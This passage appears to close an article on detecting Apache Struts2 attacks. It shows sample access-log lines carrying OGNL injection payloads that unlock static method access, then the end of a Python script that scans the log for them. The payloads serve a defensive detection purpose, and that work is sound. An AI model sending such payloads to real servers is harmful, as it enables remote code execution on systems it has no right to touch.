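203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /index.action?('%5Cu0023_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('%5Cu0023context['xwork.MethodAccessor.denyMethodExecution']%5Cu003dfalse')(b)) HTTP/1.1" 200 17
203.0.113.9 - - [10/Oct/2023:13:55:44 +0000] "POST /login.action?('\u0023_memberAccess['allowStaticMethodAccess']')(meh)=true HTTP/1.1" 200 17
""".strip().splitlines()

if __name__ == "__main__":
    for line_no, findings in scan_access_log(SAMPLE_LOG):
        for f in findings:
            print(line_no, f["markers"], f["name"])
```

The same `scan()` function can be applied to a form-encoded POST body, since the post sends these parameters both ways.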
Article source: lcx.cc: stuts2 EXP POST data